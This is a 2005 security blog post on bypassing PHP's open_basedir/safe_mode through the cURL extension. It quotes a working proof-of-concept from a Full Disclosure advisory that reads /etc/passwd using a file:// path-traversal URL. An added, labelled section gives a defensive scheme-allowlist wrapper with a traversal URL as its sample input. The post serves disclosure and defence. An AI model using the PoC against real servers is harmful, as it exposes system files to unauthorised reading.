Xavier's Security Post
Tuesday, October 18, 2005
  openbasedir / safemode bypass via GD / cURL
On Date: Mon, 17 Oct 2005 22:55:26 +0200, a post on Full Disclosure came through to my inbox. "PHP Safedir Restriction Bypass Vulnerabilities" was its title and my reaction was weeee! After reading through the post I realized the vulnerabilities do not affect the core of PHP, but two extensions: GD and cURL. Excerpts from the post go as follows:


...

curl openbasedir and safemode bypass.
POC:

<?php

mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd");

$file=curl_exec($ch);

echo $file;

?>



I always wondered if such an attack was even possible, since I had an understanding that extensions are run under PHP's directives. But now this is interesting -- one has to wonder how many other PHP extensions are capable of bypassing safemode/openbasedir at this instant.
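A defensive counterpart to the PoC above, as an added example that is not part of the original post or the quoted advisory: a wrapper that keeps file:// and every other non-web scheme away from libcurl, both in PHP and inside libcurl itself. The function name fetch_remote is hypothetical, and the code assumes PHP 7 or later built against a libcurl that supports CURLOPT_PROTOCOLS (7.19.4 or later).

```php
<?php
// Added example: hypothetical helper, not code from the advisory or from PHP.
// Only http:// and https:// URLs are ever handed to libcurl, so a URL supplied
// by a script cannot be used to read local files through the cURL extension.

function fetch_remote(string $url): string
{
    // Reject control characters and whitespace (embedded newlines, NUL bytes).
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        throw new InvalidArgumentException('URL contains control characters or whitespace');
    }

    // First gate: scheme allowlist, checked in PHP before any handle exists.
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        throw new InvalidArgumentException('URL scheme not allowed');
    }

    $ch = curl_init($url);
    if ($ch === false) {
        throw new RuntimeException('curl_init failed');
    }

    // Second gate: the same allowlist enforced by libcurl, redirects included,
    // so the outcome does not rest on PHP's own parsing of the URL.
    $mask = CURLPROTO_HTTP | CURLPROTO_HTTPS;
    curl_setopt($ch, CURLOPT_PROTOCOLS, $mask);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, $mask);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException('transfer failed: ' . curl_error($ch));
    }
    return $body;
}

// Constructed sample input: a file:// URL of the same shape as the PoC's.
try {
    fetch_remote('file:///var/www/site/index.php?/../../../etc/passwd');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```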
 
This public blog will be a place for me to output any Security findings, both technological and physical, that I have come about. I will post Security advisories I was a part of, and also other interesting bits of knowledge. email: xavier [at] tigerteam.se
